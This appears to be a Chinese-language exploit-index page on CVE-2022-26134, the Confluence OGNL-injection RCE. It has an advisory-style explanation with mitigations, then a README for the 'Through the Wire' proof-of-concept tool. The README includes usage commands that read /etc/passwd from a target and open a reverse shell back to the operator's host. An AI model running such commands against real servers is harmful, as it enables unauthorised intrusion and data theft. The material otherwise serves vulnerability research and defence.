Share
## https://sploitus.com/exploit?id=0D82568E-1BE6-532A-B930-085AE2C9280C
# CVE-2022-26134-poc
**CVE-2022-26134** 是一个影响 Atlassian Confluence Server 和 Data Center 的 **远程代码执行漏洞(RCE)**,其成因是服务器处理 OGNL 表达式时未能正确过滤输入,从而允许攻击者以特权账户权限执行任意代码。
---
### **漏洞原理**
1. **OGNL 表达式注入**:
- OGNL (Object-Graph Navigation Language) 是一种 Java 的表达式语言,用于操作 Java 对象的属性。
- Atlassian Confluence Server 使用 OGNL 处理用户输入,但在某些接口中未能正确验证和过滤用户输入。
- 攻击者可以通过构造恶意的 OGNL 表达式,在服务端未经授权执行这些表达式。
2. **未授权访问**:
- 此漏洞的利用不需要认证,任何未登录的攻击者都可以直接发送恶意请求。
- 一旦服务器解析并执行攻击者注入的 OGNL 表达式,攻击者可以远程执行任意命令或代码。
3. **攻击路径**:
- 攻击者通常会通过公开的 Confluence 服务接口,发送专门设计的恶意 HTTP 请求。
- 这些请求可能利用特定的 HTTP 头或参数注入 OGNL 表达式。
---
### **危害**
1. **远程代码执行**:
- 攻击者可以完全接管受影响的服务器,包括执行任意命令、安装恶意软件、植入后门等。
2. **数据泄露**:
- 攻击者可以访问服务器上的敏感信息,例如数据库配置、存储的用户数据等。
3. **横向移动**:
- 在攻击成功后,攻击者可能会利用服务器作为跳板,进一步攻击内网的其他系统。
4. **DDoS 和恶意负载部署**:
- 攻击者可以利用受害服务器执行分布式拒绝服务攻击(DDoS),或者部署加密挖矿恶意软件。
5. **影响范围广泛**:
- 由于 Confluence 是一种常用于企业协作的工具,全球大量公司受到影响。
- 如果服务面向互联网,攻击者可以通过简单扫描发现易受攻击的实例。
---
### **受影响版本**
- Atlassian Confluence Server 和 Data Center:
- **7.18.0及以下版本**
- **7.4.17及以下LTS版本**
---
### **修复与缓解措施**
1. **升级软件**:
- Atlassian 已发布补丁,受影响的用户应尽快升级到以下安全版本:
- 7.4.17 或更高版本
- 7.18.1 或更高版本
2. **临时缓解**:
- 如果无法立即升级,建议限制对 Confluence 服务的访问,例如通过防火墙限制仅可信IP访问。
3. **监控和检测**:
- 检查服务器日志中是否存在异常请求。
- 使用安全工具扫描是否已被利用。
4. **删除恶意后门**:
- 如果发现服务器已被攻陷,应立即隔离系统并检查是否存在植入的恶意代码或后门。
---
### **总结**
CVE-2022-26134 是一个危险性极高的漏洞,尤其因为其无需认证即可利用的特性,可能导致严重的企业数据泄露和服务中断。及时应用安全更新和加强系统监控是应对此类漏洞的关键。
**Through the Wire** 是一个概念验证漏洞利用工具,针对 [CVE-2022-26134] 的漏洞,这是一个影响 Atlassian Confluence Server 和 Data Center(7.13.6 LTS 及更低版本,以及 7.18.0)的 OGNL 注入漏洞。该漏洞曾是被广泛利用的零日漏洞。
### 工具特点
- 提供两种利用方式:
1. **反向Shell**:通过调用 `bash` 启动,可能更容易被检测。
2. **文件读取**:直接从内存执行,不易被检测。
- **支持系统**:仅适用于 Linux 版本的 Confluence,不支持 Windows。
- **测试版本**:7.13.6 LTS 和 7.18.0。
---
### 使用示例
#### 读取文件
```bash
python3 through_the_wire.py --rhost <目标IP> --rport <目标端口> --lhost <本地IP> --protocol http:// --read-file /etc/passwd
```
#### 获取Shell
```bash
python3 through_the_wire.py --rhost <目标IP> --rport <目标端口> --lhost <本地IP> --protocol http:// --reverse-shell
```
---
### 说明
1. **反向Shell** 会生成并发送Payload,从目标机器上获取Shell。
2. **文件读取** 示例可以直接读取目标系统的文件内容(如 `/etc/passwd`)。
---
### 致谢
- 向 APT31 致意。
- 灵感来源:Ye([观看视频](https://www.youtube.com/watch?v=AE8y25CcE6s))。
---
### 附加资源
- **示例数据包**:[下载链接](https://github.com/jbaines-r7/through_the_wire/files/8833875/confluence_two_pcap.zip)
- **视频演示**:[点击观看](https://youtu.be/GP9C4D0YNkM)